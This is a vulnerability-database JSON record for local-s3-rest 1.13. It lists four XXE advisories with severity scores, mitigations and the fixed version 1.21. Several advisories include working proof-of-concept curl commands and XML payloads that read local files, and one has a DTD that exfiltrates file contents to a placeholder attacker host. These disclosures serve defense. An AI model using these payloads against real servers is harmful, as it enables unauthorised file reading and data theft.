{"url":"http://public2.vulnerablecode.io/api/packages/785740?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.13","type":"maven","namespace":"io.github.robothy","name":"local-s3-rest","version":"1.13","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.21","latest_non_vulnerable_version":"1.21","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360724?format=json","vulnerability_id":"VCID-1mqk-f6zx-6kf2","summary":"LocalS3 XML Parser Vulnerable to XML External Entity (XXE) Injection\n## Description\n\nThe LocalS3 project, which implements an S3-compatible storage interface, contains a critical XML External Entity (XXE) Injection vulnerability in its XML parsing functionality. When processing XML requests for multipart upload operations, the application accepts and processes XML external entities, allowing an attacker to read local system files and potentially make outbound network connections.\n\nThe vulnerability exists because the XML parser is configured to process external entities and DTD (Document Type Definition) declarations without proper restrictions. This allows an attacker to define external entities that can read local files and exfiltrate their contents through outbound HTTP requests.\n\nThe vulnerability is particularly severe as it allows direct access to sensitive files on the filesystem, bypassing any directory traversal protections that might be in place for normal S3 operations.\n\n## Steps to Reproduce\n\n1. Create a malicious DTD file containing the following content:\n```\n<!ENTITY % file SYSTEM \"file:///etc/hostname\">\n<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?flag=%file;'>\">\n%eval;\n%exfil;\n```\n\n2. Host the malicious DTD file on an accessible web server\n\n3. Initialize a multipart upload to the LocalS3 server:\n```\ncurl -X PUT \"http://app/test-bucket/test.txt?uploads\"\n```\n\n4. Send a POST request to complete the multipart upload with the following XML payload:\n    ```\n   curl -X POST \"http://app/test-bucket/test.txt?uploadId=[upload-id]\" \\\n   -H \"Content-Type: application/xml\" \\\n   -d '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE data [\n   <!ENTITY % dtd SYSTEM \"http://attacker.domain/evil.dtd\">\n   %dtd;\n   ]>\n   <CompleteMultipartUpload>\n       <Part>\n           <PartNumber>1</PartNumber>\n           <ETag>test</ETag>\n       </Part>\n   </CompleteMultipartUpload>'\n    ```\n\nThe server will process the XML, load the external DTD, and when evaluating the entities, will read the contents of /etc/hostname and send them to the attacker's server via an HTTP request.\n\n## Mitigations\n\n- Disable DTD processing in the XML parser configuration\n- If DTD processing is required, disable the ability to load external entities and external DTDs\n- Implement XML parsing with secure defaults using JAXP's XMLConstants.FEATURE_SECURE_PROCESSING feature\n- Set up proper input validation and sanitization for all XML processing operations\n\n## Impact\n\nAn attacker can exploit this vulnerability to read arbitrary files from the server's filesystem and exfiltrate their contents through outbound HTTP requests. The vulnerability requires no authentication and can be exploited by anyone who can send requests to the LocalS3 server. This could lead to exposure of sensitive information including configuration files, credentials, and other confidential data stored on the server.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-47qw-ccjm-9c2c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-47qw-ccjm-9c2c"},{"reference_url":"https://github.com/advisories/GHSA-47qw-ccjm-9c2c","reference_id":"GHSA-47qw-ccjm-9c2c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-47qw-ccjm-9c2c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-47qw-ccjm-9c2c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1mqk-f6zx-6kf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360709?format=json","vulnerability_id":"VCID-6ayy-dk32-ebbn","summary":"LocalS3 Project Vulnerable to XML External Entity (XXE) Injection via Bucket Tagging API\n## Description\nThe LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.\n\nWhen processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.\n\nThe vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.\n\n## Steps to Reproduce\n1. Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)\n2. Send a PUT request to the bucket tagging endpoint with the following XML payload:\n   ```xml\n   <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE data [\n       <!ENTITY xxe SYSTEM \"file:///flag.txt\" >\n   ]>\n   <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>\n   ```\n\n    ```\n    curl -X PUT \\\n         -H \"Host: app\" \\\n         -H \"Authorization: AWS dummy:dummy\" \\\n         -H \"Content-Type: application/xml\" \\\n         --data-binary @xxe.xml \\\n         http://app/bucket?tagging\n    ```\n\n3. Retrieve the bucket tags using a GET request to the same endpoint\n\n    ```\n    curl -H \"Authorization: AWS dummy:dummy\" http://app-1/bucket?tagging\n    ```\n\n4. The content of the targeted file will be returned in the tag value\n\nThe successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.\n\n## Mitigations\n- Disable XML external entity resolution in the XML parser configuration\n- Implement proper XML parsing security controls such as disabling DTD processing altogether\n- Use a safe parser configuration that doesn't process external entities or DTDs by default\n- Validate and sanitize all XML input before processing to prevent injection of malicious entities\n\n## Impact\nCritical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-v232-254c-m6p7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-v232-254c-m6p7"},{"reference_url":"https://github.com/advisories/GHSA-v232-254c-m6p7","reference_id":"GHSA-v232-254c-m6p7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v232-254c-m6p7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-v232-254c-m6p7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6ayy-dk32-ebbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/117152?format=json","vulnerability_id":"VCID-gsmm-qjk6-83dn","summary":"LocalS3 is an Amazon S3 mock service for testing and local development. Prior to version 1.21, the LocalS3 service's bucket creation endpoint is vulnerable to XML External Entity (XXE) injection. When processing the CreateBucketConfiguration XML document during bucket creation, the service's XML parser is configured to resolve external entities. This allows an attacker to declare an external entity that references an internal URL, which the server will then attempt to fetch when parsing the XML. The vulnerability specifically occurs in the location constraint processing, where the XML parser resolves external entities without proper validation or restrictions. When the external entity is resolved, the server makes an HTTP request to the specified URL and includes the response content in the parsed XML document. This vulnerability can be exploited to perform server-side request forgery (SSRF) attacks, allowing an attacker to make requests to internal services or resources that should not be accessible from external networks. The server will include the responses from these internal requests in the resulting bucket configuration, effectively leaking sensitive information. The attacker only needs to be able to send HTTP requests to the LocalS3 service to exploit this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27136","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01139","published_at":"2026-06-14T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01129","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01136","published_at":"2026-06-13T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.0113","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27136"},{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27136","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27136"},{"reference_url":"https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f","reference_id":"d6ed756ceb30c1eb9d4263321ac683d734f8836f","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T19:08:39Z/"}],"url":"https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f"},{"reference_url":"https://github.com/advisories/GHSA-g6wm-2v64-wq36","reference_id":"GHSA-g6wm-2v64-wq36","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g6wm-2v64-wq36"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-g6wm-2v64-wq36","reference_id":"GHSA-g6wm-2v64-wq36","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T19:08:39Z/"}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-g6wm-2v64-wq36"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["CVE-2025-27136","GHSA-g6wm-2v64-wq36"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gsmm-qjk6-83dn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360686?format=json","vulnerability_id":"VCID-uyuk-z7fn-cbbe","summary":"LocalS3 Project Bucket Operations Vulnerable to XML External Entity (XXE) Injection\n## Description\n\nThe LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.\n\nThe vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.\n\nThis type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.\n\n## Steps to Reproduce\n\n1. Create a test bucket using PUT request to http://[server]/[bucket-name]\n\n    ```\n    curl -X PUT \"http://app/xxe-test-bucket2\"```\n    ```\n\n2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:\n   ```\n   curl -X PUT \"http://app/xxe-test-bucket2?acl\" \\\n   -H \"Content-Type: application/xml\" \\\n   -d '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE AccessControlPolicy [\n       <!ENTITY xxe SYSTEM \"file:///etc/hostname\" >\n   ]>\n   <AccessControlPolicy>\n       <Owner>\n           <ID>&xxe;</ID>\n           <DisplayName>test</DisplayName>\n       </Owner>\n       <AccessControlList>\n           <Grant>\n               <Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">\n                   <ID>test</ID>\n                   <DisplayName>test</DisplayName>\n               </Grantee>\n               <Permission>FULL_CONTROL</Permission>\n           </Grant>\n       </AccessControlList>\n   </AccessControlPolicy>'\n   ```\n\n3. Send a GET request to `http://[server]/[bucket-name]?acl` to retrieve the bucket ACL\n\n    ```\n    curl \"http://app/xxe-test-bucket2?acl\"\n    ```\n\nAfter performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.\n\n## Mitigations\n\n- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true\n- Disable DOCTYPE declarations in the XML parser configuration\n- Implement XML input validation and sanitization before processing\n- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary\n\n## Impact\n\nThe vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj"},{"reference_url":"https://github.com/advisories/GHSA-2466-4485-4pxj","reference_id":"GHSA-2466-4485-4pxj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2466-4485-4pxj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-2466-4485-4pxj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uyuk-z7fn-cbbe"}],"fixing_vulnerabilities":[],"risk_score":"3.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.13"}